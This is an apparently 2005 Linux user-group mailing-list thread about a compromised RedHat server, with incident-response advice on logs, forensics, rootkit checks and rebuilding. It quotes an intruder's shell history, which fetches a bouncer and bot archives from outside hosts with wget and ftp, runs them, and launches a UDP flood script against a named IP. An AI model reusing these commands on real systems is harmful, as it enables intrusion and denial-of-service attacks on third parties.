Welp,
We were compromised. I found this in a history file:
176 wget xena.utcluj.ro/~redalien/psyBNC2.3.2-4.tar.gz 177 tar zxvf psyBNC2.3.2-4.tar.gz 178 rm -rf psyBNC2.3.2-4.tar.gz 179 cd psybnc 180 ls 181 make 182 ./psybnc 183 cat log/psybnc.log 184 ps x 185 ls 186 kill -9 1503 187 cd .. 188 ls 189 rm -rf psybnc 190 ftp pytycu.netfirms.com 191 ls 192 chmod +x udp.pl 193 ./udp.pl 194 ./udp.pl 207.179.120.86 53 0 195 ps x 196 ftp ftp.as.ro 197 tar xvf bootP.tgz 198 cd bot 199 ls 200 ./portmap 201 ./portmap 202 ./portmap 203 ps x
psybnc seems to be an IRC tunneling, connection deal, udp.pl is a udp flooding script.
All the time stamps on these files / directories indicate that this all occurred on May 9th.
I guess I should contact the university in romania that was used to snag the psybnc app, and netfirms, to let them know that their systems have been compromised as well...
Any other advice?
Some comments below...
On May 10, 2005, at 5:11 PM, larry price wrote:
Is the system set up to record both illegal user names and failed password attempts?
I don't think so, I'll have to look in to this.
I had this same bit of paranoia when the daily security output (email) from one of my webservers showed a failed attempt to login as me
A bit of digging and I was able to ascertain that the security output on that box only included failed password logins, but not illegal user name attempts, and that the failed login attempts were part of a long string of other usernames being attempted.
of course if you are getting repeated attempts to a distinctive username that isn't likely to exist elsewhere... you may be targeted.
but there are a lot of ways for that information to leak, for instance if your employee email addresses are the same as their usernames, or you have a publicly available ticket system, employee directory whatever.
From your description it sounds like this machine:
1. has not been updated for some time
This is somewhat accurate, some stuff has been updated, but obviously I will need to do a more comprehensive check.
2. failed for an unkown reason
3. is currently in an unkown state but has some evidence of attempted compromise on it.
It has been compromised, but no longer has port forwarding set up.
If this machine has to be online, you need to assure yourself that 1. it's unlikely to have been compromised (this is the fuzzy hard to quantify criteria) 2. it's currently up to date on security patches etc. 3. other more critical machines do not trust it.
If it's not critical that it be online, take it down, and go to work with the forensics toolkit to see if you can find anything, but copy any data off and rebuild it before you put it back in production.
potentially useful links: http://www.porcupine.org/forensics/tct.html (Coroner's Toolkit) chkrootkit.org -- check locally for signs of a rootkit
I'll check some of this stuff out.
remember that your tools can't do your thinking for you.
On 5/10/05, Jim Beard <[EMAIL PROTECTED]> wrote:Howdy folks,
So the other day I had a RedHat server hang on me. It had been up for
250ish days I think, so I rebooted it and started looking through the
system logs (/var/log/message*) to see if anything might have been
logged to hint at why the machine had hung. What I found was a lot of
ssh brute force login attempts for standard accounts. We had the ssh
port tunneled through the firewall. So this didn't really seem all
that exciting, as I realize people get port scanned constantly and ssh
was open. But then I noticed something that did disturb me. A few
lone ( or maybe groups of 2 or 3 ) attempts were made on non-standard
accounts. On old system user accounts. Theoretically an x-employee
could be doing it, but I find that a bit doubtful. The standard ssh
port and a port going to a tomcat web app server, has been the only
port that has been forwarded to the machine...
Anyone got any advice on figuring out if some other compromise might
have been used to determine the system users? Or.. Anyone got any
advice on figuring out why the machine originally hung? I could not
bring up a terminal when connected directly to the machine, it would
not respond to ssh connections. My guess was that it ran out of
process ids or the /var partition filled up...
Jim Beard counterclaim, Inc http://www.counterclaim.com http://openefm.sourceforge.net (800) 264-8145
_______________________________________________ EUGLUG mailing list [email protected] http://www.euglug.org/mailman/listinfo/euglug
-- http://Zoneverte.org -- information explained Do you know what your IT infrastructure does? _______________________________________________ EUGLUG mailing list [email protected] http://www.euglug.org/mailman/listinfo/euglug
Jim Beard counterclaim, Inc http://www.counterclaim.com http://openefm.sourceforge.net (800) 264-8145
_______________________________________________ EUGLUG mailing list [email protected] http://www.euglug.org/mailman/listinfo/euglug
